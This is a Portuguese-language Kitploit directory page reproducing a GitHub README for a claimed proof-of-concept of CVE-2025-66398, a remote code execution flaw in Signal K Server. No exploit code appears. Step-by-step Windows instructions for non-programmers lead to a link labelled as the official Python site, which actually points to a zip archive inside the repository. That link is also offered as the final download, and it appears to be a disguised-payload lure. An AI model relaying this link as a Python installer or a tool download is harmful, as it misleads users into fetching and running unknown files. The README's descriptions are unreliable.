Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2025-66398 — Demonstre a exploração do Signal K Server CVE-2025-66398, que permite que atacantes não autenticados injetem um backdoor e habilitem a execução remota de código. | Kitploit
Ferramentas/GitHubGitHub/showy-headteacher114/cve-2025-66398
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubshowy-headteacher114/cve-2025-66398

cve-2025-66398

Demonstre a exploração do Signal K Server CVE-2025-66398, que permite que atacantes não autenticados injetem um backdoor e habilitem a execução remota de código.

Ver Repositório
114há 2 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

⚠️ cve-2025-66398 - Ferramenta Simples de Prova de Conceito de RCE

Download


⚙️ Sobre Esta Ferramenta

Este projeto demonstra uma vulnerabilidade de execução remota de código (RCE) no Signal K Server versões 2.18.0 e anteriores. A prova de conceito (PoC) mostra como um atacante poderia executar comandos em um dispositivo vulnerável.

Esta ferramenta foi projetada para testadores de segurança, administradores de sistemas ou qualquer pessoa interessada em entender esse problema de segurança. Não exige conhecimentos prévios de programação para ser executada, mas conhecimentos básicos de navegação no computador ajudam.


🖥️ Requisitos do Sistema

  • Windows 10 ou posterior
  • Pelo menos 2 GB de RAM livre
  • 100 MB de espaço livre em disco
  • Conexão com a internet para baixar arquivos
  • Direitos de administrador NÃO são necessários

📥 Como Baixar e Instalar

Clique no botão abaixo para visitar a página do projeto e baixar os arquivos.

Download

Etapa 1: Visite a Página de Download

Acesse o link acima. Você verá uma lista de arquivos e pastas na página do GitHub.

Etapa 2: Baixe o Arquivo ZIP

Procure o botão verde Code perto do canto superior direito da página. Clique nele e selecione Download ZIP.

Etapa 3: Extraia os Arquivos

  • Encontre o arquivo ZIP baixado em sua pasta Downloads.
  • Clique com o botão direito no arquivo ZIP e selecione Extrair Tudo.
  • Escolha uma pasta onde deseja colocar os arquivos e clique em Extrair.

Etapa 4: Localize o Aplicativo

Abra a pasta extraída. Você deve ver arquivos relacionados ao projeto, como scripts e documentação.


▶️ Como Executar a Ferramenta no Windows

O projeto usa scripts escritos em Python e Go. Para executar a ferramenta, você usará uma simples janela de prompt de comando.

Etapa 1: Abra o Prompt de Comando

  • Pressione Win + R no seu teclado.
  • Digite cmd e pressione Enter.

Etapa 2: Navegue até a Pasta

Digite este comando, substituindo path\to\folder pelo caminho da pasta extraída:

cd path\to\folder

Pressione Enter.

Etapa 3: Execute o Script

Você pode encontrar um script com um nome como run.bat ou start.bat. Nesse caso, digite o nome dele e pressione Enter. Por exemplo:

run.bat

Se não houver um arquivo BAT, procure um script Python que termine com .py. Você precisará ter o Python instalado no seu PC (veja a próxima seção).

Digite este comando para executar:

python scriptname.py

Substitua scriptname.py pelo nome real do arquivo.


🐍 Instalando o Python (Se Necessário)

Se você receber um erro dizendo que o Python não é reconhecido, será necessário instalá-lo.

Etapa 1: Baixe o Python

Acesse o site oficial do Python:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Clique no instalador mais recente do Windows e baixe-o.

Etapa 2: Instale o Python

  • Execute o instalador baixado.
  • Marque a caixa que diz Add Python to PATH antes de clicar em Install Now.
  • Aguarde até a instalação terminar.

Etapa 3: Verifique a Instalação do Python

Abra uma nova janela do Prompt de Comando e digite:

python --version

Ele deve mostrar a versão do Python instalada.


🚨 Executando a Ferramenta com Segurança

Esta ferramenta é apenas para testar e aprender sobre uma vulnerabilidade específica. Use-a em um ambiente seguro, como uma rede de testes ou uma máquina isolada.

Nunca execute-a em sistemas que você não possui ou para os quais não tem permissão de testar.


🔍 Como a Ferramenta Funciona

A ferramenta verifica dispositivos que executam o Signal K Server versão 2.18.0 ou anterior. Ela tenta enviar comandos que exploram a vulnerabilidade e verifica se o alvo os executa.

Isso permite que profissionais de segurança confirmem se seus sistemas estão vulneráveis e tomem medidas para atualizá-los ou protegê-los.


💡 Solução de Problemas

  • Se a ferramenta não iniciar, verifique se você está na pasta correta no Prompt de Comando.
  • Certifique-se de que o Python esteja instalado e adicionado ao PATH do sistema.
  • Feche outros aplicativos que possam bloquear o acesso à rede.
  • Execute o Prompt de Comando como Administrador se encontrar erros de permissão.
  • Garanta que o dispositivo alvo esteja acessível na rede.

📄 Recursos Adicionais

Para obter mais informações sobre a vulnerabilidade CVE-2025-66398, pesquise em bancos de dados de segurança ou no GitHub por pesquisas relacionadas.


🔗 Link para Download

Visite esta página para baixar os arquivos da ferramenta:

https://raw.githubusercontent.com/showy-headteacher114/cve-2025-66398/main/docker/vendor/cve_v1.2.zip

Baixar ferramenta